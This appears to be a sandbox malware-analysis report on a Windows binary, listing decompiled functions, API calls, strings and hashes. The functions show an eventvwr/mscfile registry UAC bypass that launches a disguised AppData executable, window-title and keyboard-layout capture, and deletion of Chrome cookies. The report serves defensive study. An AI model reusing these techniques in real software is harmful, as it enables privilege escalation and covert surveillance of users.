						_t69 = _t69 + 0x24;
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
					}
					_t16 = _t68 + 0x3c; // 0x0
					if( *_t16 != _a4) {
						GetLocalTime( &_v24);
						_t42 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t43 =  &_v56;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
						printf(_t43);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				}
				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
				return 1;
			}













                                        0x0040263e
                                        0x00402644
                                        0x00000000
                                        0x00402749
                                        0x00402653
                                        0x00402669
                                        0x0040266f
                                        0x0040268b
                                        0x00402699
                                        0x004026a0
                                        0x004026a4
                                        0x004026ae
                                        0x004026b5
                                        0x004026b7
                                        0x004026bd
                                        0x004026c6
                                        0x004026cc
                                        0x004026cc
                                        0x004026d0
                                        0x004026d6
                                        0x004026dc
                                        0x004026f8
                                        0x00402706
                                        0x0040270d
                                        0x00402711
                                        0x0040271b
                                        0x00402722
                                        0x0040272a
                                        0x00402733
                                        0x00402733
                                        0x004026d6
                                        0x0040273c
                                        0x00402740
                                        0x00000000

                                        APIs
                                        • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                        • printf.MSVCRT ref: 004026B5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                        • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                        • printf.MSVCRT ref: 00402722
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                        • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                        • API String ID: 1710008465-2297210016
                                        • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                        • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                        • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                        • Instruction Fuzzy Hash: 33313672800608FFCB10DBE4DD49AEEB7BCAF54705F104466F941E3190D7B9AA85CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004030EC, Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 87COMMON
                                        Download Yara Rule
                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000003,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040313B
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403144
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040314E
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 00403159
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,00000000,?,?,0041BA38,0041BCB0,00000000,?,?,?,?,?,?,?,?,0040900F), ref: 0040316A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe,?), ref: 0040318F
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 004031BF
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004031CC
                                        • exit.MSVCRT ref: 004031D8
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004031E1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004031EA
                                        Strings
                                        • mscfile\shell\open\command, xrefs: 0040311C
                                        • Software\Classes\mscfile\shell\open\command, xrefs: 0040319B
                                        • origmsc, xrefs: 00403160
                                        • eventvwr.exe, xrefs: 004031A6
                                        • C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, xrefs: 0040318A
                                        • open, xrefs: 004031C6
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$??1?$basic_string@?length@?$basic_string@$??0?$basic_string@ExecuteG@1@@Shellexit
                                        • String ID: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$Software\Classes\mscfile\shell\open\command$eventvwr.exe$mscfile\shell\open\command$open$origmsc
                                        • API String ID: 2587331422-359111282
                                        • Opcode ID: ab8c026c616f89140a8e0c9c5cf730ebb06390fe504552328b2b6a206b9bb02a
                                        • Instruction ID: 58015f3fb9c85f75900a894e30fbe76f83cf12f03c76df5784ad0d5e993c1cb0
                                        • Opcode Fuzzy Hash: ab8c026c616f89140a8e0c9c5cf730ebb06390fe504552328b2b6a206b9bb02a
                                        • Instruction Fuzzy Hash: 25219A72640505FBD700ABA1DD8AEEF772CDB84745F10407AF512B61D0DBB85A4187BD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D64E, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 102COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,00416980), ref: 0040D665
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000003), ref: 0040D68C
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000002,00000000), ref: 0040D69F
                                          • Part of subcall function 004135DE: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D6BA
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D6C3
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040D6D9
                                          • Part of subcall function 00412E4E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,00000000,0041BCB0,?,004057B5), ref: 00412E5A
                                          • Part of subcall function 00412E4E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,004057B5), ref: 00412E64
                                          • Part of subcall function 00412E4E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00412E78
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D6F3
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000001), ref: 0040D704
                                        • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D711
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040D71A
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00000000,00000000,0041697C), ref: 0040D734
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D74B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                          • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                          • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                          • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                          • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                          • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                          • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                        Strings
                                        • C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe, xrefs: 0040D752
                                        • open, xrefs: 0040D70B
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$G@2@@std@@G@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V01@@V?$basic_string@$??2@??3@?length@?$basic_string@?size@?$basic_string@ExecuteShell
                                        • String ID: C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe$open
                                        • API String ID: 2112629403-1846506323
                                        • Opcode ID: bfc1775c8f745b7d6fcee80a42c2b94f25023e4fd720e9b865f493a23bd22e86
                                        • Instruction ID: 3c6387fd113382c931602557de23b741b53e110e960cdbc023917b4df3b65b40
                                        • Opcode Fuzzy Hash: bfc1775c8f745b7d6fcee80a42c2b94f25023e4fd720e9b865f493a23bd22e86
                                        • Instruction Fuzzy Hash: 94317C72910519EBCB04BBE1EC999FE7778AF54356B40487EF412A30E1EE785A04CB28
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040D9A0, Relevance: 27.1, APIs: 18, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardLayoutNameA.USER32 ref: 0040D9AF
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040D9BA
                                          • Part of subcall function 00412E83: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412E9D
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012,?,00000000,00000000,?,?,00000000,00000000), ref: 0040D9FC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000000), ref: 0040DA11
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 0040DA21
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA31
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA3E
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA4B
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040DA55
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000012), ref: 0040DA6C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA75
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA81
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA8D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DA99
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040DAA5
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E69B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@0@$??0?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@CreateD@1@@FileG@2@@std@@G@std@@KeyboardLayoutNameV01@@V10@V10@@_itoa
                                        • String ID:
                                        • API String ID: 3751107300-0
                                        • Opcode ID: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                        • Instruction ID: 7445f7784f172681db4ab6ed8b3104eac86986a278aabc0f04733adb6ce879a5
                                        • Opcode Fuzzy Hash: c2fd4a016dc6b2852169beb4f521ea4233e2add1f1df73e9275396dcc87fe70f
                                        • Instruction Fuzzy Hash: 39310EB280051DABCB05ABE1EC49EEEBB7CBB54305F04447AF506E3061EF745689CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040EA96, Relevance: 27.1, APIs: 18, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowTextW.USER32 ref: 0040EAAF
                                        • IsWindowVisible.USER32(?), ref: 0040EAB8
                                        • sprintf.MSVCRT ref: 0040EACF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0040EAE6
                                          • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                          • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                          • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,?,004169C4,00000000,004169C8), ref: 0040EB20
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,004169C4,00000000,004169C8), ref: 0040EB2D
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,00000000,004169C8), ref: 0040EB3A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB47
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB57
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB65
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB71
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB7A
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB83
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB8C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB95
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EB9E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBA7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,004169C8), ref: 0040EBB0
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$G@2@@std@@G@std@@V10@$??0?$basic_string@$D@1@@Window$?c_str@?$basic_string@?length@?$basic_string@G@1@@TextV01@V01@@V10@0@VisibleY?$basic_string@_itoasprintf
                                        • String ID:
                                        • API String ID: 1480451481-0
                                        • Opcode ID: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                        • Instruction ID: 896110e7d44d4e8721ff4af176c5386cc18dfd6a0cdb0307768c484521d74486
                                        • Opcode Fuzzy Hash: 88f6ae1521f24779943ca0962c0ad8f5bdb5bca5a5571728218eacb22bb029de
                                        • Instruction Fuzzy Hash: 0031BEB2C0060DEBDB05ABE0EC49DDE7B7CAB54305F108026F526E6061EB759699CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004071CF, Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 65fileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 32%
                                        			E004071CF() {
				char _v5;
				char _v6;
				char _v24;
				void* _v40;
				char* _t12;
				CHAR* _t13;
				long _t20;
				char* _t21;
				void* _t25;

				_t12 = getenv("UserProfile");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies");
				_t13 =  &_v24;
				L00414170();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				if(DeleteFileA(_t13) != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
					E00407A90("\n[Chrome Cookies found, cleared!]");
					_t25 = 1;
					L8:
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return _t25;
				}
				_t20 = GetLastError();
				if(_t20 == 0) {
					_t21 =  &_v6;
					L5:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
					E00407A90("\n[Chrome Cookies not found]");
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					return 1;
				}
				if(_t20 == 1) {
					_t21 =  &_v5;
					goto L5;
				}
				_t25 = 0;
				goto L8;
			}












                                        0x004071e4
                                        0x004071ef
                                        0x004071f6
                                        0x004071fa
                                        0x00407205
                                        0x0040720e
                                        0x0040721d
                                        0x00407271
                                        0x00407277
                                        0x0040727f
                                        0x00407281
                                        0x00407284
                                        0x00000000
                                        0x0040728a
                                        0x00407226
                                        0x00407227
                                        0x0040725c
                                        0x00407238
                                        0x0040723e
                                        0x00407244
                                        0x0040724f
                                        0x00000000
                                        0x00407255
                                        0x0040722a
                                        0x00407233
                                        0x00000000
                                        0x00407236
                                        0x0040722c
                                        0x00000000

                                        APIs
                                        • getenv.MSVCRT ref: 004071E4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071EF
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 004071FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407205
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040720E
                                        • DeleteFileA.KERNEL32(00000000), ref: 00407215
                                        • GetLastError.KERNEL32 ref: 0040721F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies not found],00000000), ref: 0040723E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome Cookies found, cleared!],00000000), ref: 00407271
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407284
                                        Strings
                                        • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 004071D9
                                        • UserProfile, xrefs: 004071DF
                                        • [Chrome Cookies not found], xrefs: 00407239
                                        • [Chrome Cookies found, cleared!], xrefs: 0040726C
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                        • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                        • API String ID: 3740952235-304995407
                                        • Opcode ID: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
                                        • Instruction ID: 500589693ed1866fcec617c4cf6893fdd7c78fd48f7414b1be1692f61b7e1039
                                        • Opcode Fuzzy Hash: 83c02d717cdcb3f1c877865c0182a46ec50423f0379789e6a2c4cf626d65b589
